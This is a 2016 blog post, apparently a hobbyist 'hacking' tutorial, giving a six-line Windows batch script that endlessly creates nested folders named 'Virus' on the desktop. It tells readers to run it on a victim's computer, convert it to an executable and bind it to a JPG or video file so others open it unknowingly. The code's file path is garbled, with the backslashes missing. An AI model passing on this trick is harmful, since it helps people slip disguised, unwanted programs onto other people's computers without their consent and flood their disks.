Sunday, September 11, 2016

Folder Replicator Harmless virus

Folder Replicator Harmless virus


Folder Replicator Batch virus

Today i gonna show you how to make a batch file that creates a folder inside a folder & so on..

I know all of them are interested in making virus so once again i came up with new virus(not a virus but its a batch file).

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.


1. Just open up a notepad, copy and paste the below code

cd
cd C:Documents and SettingsusernameDesktop
:loop
md Virus
cd Virus
goto loop

2. Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currentlylogged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
Important Tips
 To stop the process log off the system or close cmd prompt 
 Create a folder first then try it inside that else your machine will be flooded with folders within a sec depending on processor speed or clock frequency
 Dont forget to make extension of .bat else it will not work , you can use bat to exe converter to make it an executable file , bind it with a JPG file or video to prank.
 ENJOY AND HAPPY HACKING - BY SACHIN RASTOGI

download now